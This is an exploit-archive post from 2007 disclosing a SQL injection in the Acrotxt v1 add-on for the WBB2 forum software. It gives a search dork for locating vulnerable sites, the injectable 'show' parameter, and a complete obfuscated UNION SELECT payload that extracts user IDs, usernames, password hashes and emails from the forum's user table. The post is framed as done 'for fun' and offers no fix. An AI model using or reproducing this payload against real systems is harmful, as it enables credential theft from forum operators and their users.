WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection Vulnerability
# Published : 2007-08-27
# Author : D4m14n
# Previous Title : Arcadem 2.01 Remote SQL Injection / RFI Vulnerabilties
# Next Title : 2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability

####################################################################
Title: WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection
Bug by: D4m14n [11/07/2007]
Page: www.damians-world.dl.am // www.team-internet.dl.am
Dork: inurl:acrotxt.php wbb
####################################################################

SQL-Injection:
http://[target]/[path]/acrotxt.php?show=[SQL]

Example:
/acrotxt.php?show=-1'/**/UnIoN/**/SElECt/**/null,null,COnCAt(userid,', ',username,', ',password,', ',email),null,null,null,null,null/**/FroM/**/bb1_users/*

####################################################################
#    Doin' this for FUN!
#    GreetZ fly out to Trex, HANN!BAL, Eddy14, Ea$y, Kiba and many more
#
#    PS: I still hate the Black-Music-Scene...
####################################################################

# www.Syue.com [2007-08-27]